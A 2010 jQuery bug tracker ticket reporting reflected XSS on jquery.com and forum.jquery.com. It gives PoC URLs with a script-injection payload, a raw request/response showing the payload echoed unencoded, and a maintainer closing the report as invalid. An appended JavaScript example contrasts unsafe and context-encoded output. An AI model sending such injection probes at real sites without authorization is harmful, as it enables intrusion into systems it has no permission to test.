Bug Tracker

#7509 closed bug (invalid)

Opened November 14, 2010 05:21PM UTC

Closed December 01, 2010 11:34PM UTC

Last modified March 13, 2012 05:25PM UTC

Report of XSS in jquery.com

Reported by: h02332@gmail.com
Owned by: jdsharp
Priority: undecided
Milestone: 1.5
Component: web
Version: 1.4.4
Keywords:
Cc:
Blocked by:
Blocking:
Description

Report of XSS in forum.query.com and jquery.com, etc.

We tried to make a few private contacts but received no response. We've fingerprinted Cross Site Scripting and provide a Forum PoC:

http://forum.jquery.com/?d53cd"><script>alert(1)</script>f59c917a6e7=1

Also provided is a jquery.com PoC:

http://jquery.com/?d53cd"><script>alert(1)</script>f59c917a6e7=1

As noted, this can be reproduced en masse.

We'd appreciate someone from the jquery team sending us email to h02332 \\\\@\\\\/ gmail \\\\.//\\ com as we have a number of bugs to provide privately.

Thank You.

Hoyt LLC Research

Attachments (0)
Change History (12)

Changed November 14, 2010 07:49PM UTC by addyosmani comment:1

component: unfiled → web
owner: → jdsharp

Changed November 14, 2010 11:32PM UTC by dmethvin comment:2

#7510 is a duplicate of this ticket.

Changed November 14, 2010 11:33PM UTC by dmethvin comment:3

#7511 is a duplicate of this ticket.

Changed November 14, 2010 11:33PM UTC by dmethvin comment:4

#7512 is a duplicate of this ticket.

Changed November 14, 2010 11:33PM UTC by dmethvin comment:5

#7513 is a duplicate of this ticket.

Changed November 14, 2010 11:33PM UTC by dmethvin comment:6

#7514 is a duplicate of this ticket.

Changed November 14, 2010 11:33PM UTC by dmethvin comment:7

#7515 is a duplicate of this ticket.

Changed November 14, 2010 11:34PM UTC by dmethvin comment:8

#7516 is a duplicate of this ticket.

Changed November 15, 2010 12:29AM UTC by SlexAxton comment:9

status: new → assigned

Changed December 01, 2010 11:34PM UTC by snover comment:10

resolution: → invalid
status: assigned → closed

None of these reports are valid. Just because IE says it’s “changed the page” to prevent XSS doesn’t mean there is actually a vulnerability on the page, and in these cases, there was indeed no vulnerability.

Changed December 02, 2010 03:03AM UTC by anonymous comment:11

Hello-

This is the first update we've seen on this ticket.. we don't publish live PoC's for frameworks.. however, some additional info can help..

Request

GET /?d53cd"><script>alert(1)</script>f59c917a6e7=1 HTTP/1.1

Host: forum.jquery.com

Response

HTTP/1.1 200 OK

Set-Cookie: zdccn=ba2a8341-6714-4548-ba38-cb44b081796e; Path=/

<head>

<link rel="SH

...[SNIP]...

<a href="/portalLogin.do?serviceurl=/?d53cd"><script>alert(1)</script>f59c917a6e7=1&forumGroupUrl=jquery">

...[SNIP]...

This is JqueryUI ... cookies too.. http://cloudscan.blogspot.com/2010/11/jqueryuicom-cross-site-scripting.html

From the looks of this ticket, it doesn't look like more info is requested, so we'll publish the data. Sorry you didn't find the info useful.
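
The response excerpt quoted in comment 11 shows the request URI echoed unencoded inside a quoted href attribute. As an added example (not part of the ticket, and not Zoho's or jQuery's code), the JavaScript below contrasts that output with a context-encoded version and adds the raw-reflection check a triager can run on a response body, which is the evidence a browser filter warning alone does not give. All function names are hypothetical, and the sample URI is constructed from the request line in the comment.

```javascript
// Added example: hypothetical names throughout; not Zoho's or jQuery's code.

// Escape the five characters that matter in HTML text and quoted attributes.
function escapeHtml(s) {
  return String(s).replace(/[&<>"']/g, (c) => ({
    "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;",
  }[c]));
}

// "Before": the request URI is concatenated straight into a quoted attribute,
// so a double quote in the query string ends the attribute early.
function loginLinkUnsafe(requestUri) {
  return '<a href="/portalLogin.do?serviceurl=' + requestUri +
         '&forumGroupUrl=jquery">';
}

// "After": percent-encode the value as a URL parameter, then HTML-escape the
// whole attribute value for the HTML context it is written into.
function loginLinkSafe(requestUri) {
  const href = "/portalLogin.do?serviceurl=" + encodeURIComponent(requestUri) +
               "&forumGroupUrl=jquery";
  return '<a href="' + escapeHtml(href) + '">';
}

// Triage check: does the response body contain the probe byte-for-byte?
// Only a raw (unencoded) reflection keeps the markup characters intact.
function reflectsRaw(body, probe) {
  return body.includes(probe);
}

// Constructed sample input, modelled on the request line quoted in comment 11.
const PROBE = '"><script>alert(1)</script>';
const SAMPLE_URI = "/?d53cd" + PROBE + "f59c917a6e7=1";

console.log("unsafe reflects raw:", reflectsRaw(loginLinkUnsafe(SAMPLE_URI), PROBE));
console.log("safe reflects raw:  ", reflectsRaw(loginLinkSafe(SAMPLE_URI), PROBE));
console.log(loginLinkSafe(SAMPLE_URI));
```
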

Changed December 03, 2010 03:18AM UTC by snover comment:12

forum.jquery.com is not our property. We have no control over the code. You should talk to Zoho about that.